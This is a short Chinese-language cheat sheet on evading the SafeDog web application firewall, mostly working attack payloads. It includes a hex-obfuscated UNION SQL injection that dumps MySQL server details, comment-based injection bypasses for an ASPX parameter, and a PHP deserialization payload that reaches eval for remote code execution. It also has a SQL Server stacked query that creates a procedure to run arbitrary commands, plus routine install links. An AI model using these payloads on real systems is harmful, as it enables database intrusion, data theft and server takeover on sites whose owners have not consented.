2020-7 - 联合查询绕过安全狗Pyload
group_concat(0x3C68343E42797061737320736563757269747920646F672073716C5F696E6A6563743C68343E,0x3C68723E,0x4D7953514C20506F72743A20202020,@@port,0x3C68723E,0x4D7953514C2076657273696F6E3A,@@version,0x3C68723E,0x4D7953514C5F696E7374616C6C5F706174683A2020,@@basedir,0x3C68723E,0x4D7953514C5F64617461626173655F706174683A20202020,@@datadir,0x3C68723E,0x43757272656E7420646174616261736520757365723A20202020,current_user,0x3C68723E,0x73797374656D2076657273696F6E3A20202020,@@version_compile_os,0x3C68723E,0x686F73746E616D653A20202020,@@hostname,0x3C68723E,0x43757272656E742064617461626173653A20202020,database/*!()*/,0x3C68723E,0x5573657220496E666F3A20202020,user/*!()*/)
安装 - Linux
下载 http://download.safedog.cn/safedog_linux64.tar.gz wget http://download.safedog.cn/safedog_linux64.tar.gz 解压 tar xvf safedog_linux64.tar 运行 ./install.py 卸载 进入安装包解压目录 chmod +x uninstall.sh ./uninstall.sh
安装 - Windows
下载 http://down.safedog.cn/download/software/safedogfwqV5.0.exe
使用指南
https://www.safedog.cn/download/software/safedogfwq_Windows_Help.pdf https://www.safedog.cn/download/software/safedogfwq_linux_Help.pdf
绕过
规则缺陷绕过 - 搜索框 + 字符型SQL注入 + IIS + ASPX + /**a*/
aspx?Pro=广x' and 1=1 -- #检测 aspx?Pro=广x' /**a*/and 1=1 -- #绕过
#遍历
aspx?Pro=广x' /**a*/union /**a*/select 1,2,3,4,5 --
aspx?Pro=广x' /**a*/and 1=(select 1) --
PHP反序列化绕过
<?php class A{ public $name; public $male; function __destruct(){ $a = $this->name; $a($this->male); } } unserialize($_POST['un']); ?> POST - un=O:1:"A":2:{s:4:"name";s:6:"assert";s:4:"male";s:16:"eval($_GET["x"])";} GET - x=phpinfo(); --结合Hackbar使用
存储过程 + SQLServer 绕过
?type=1;EXEC/*(*/student..sp_sqlexec 'CREATE PROCEDURE myexec(@s VARCHAR(1024)) as exec(@s)'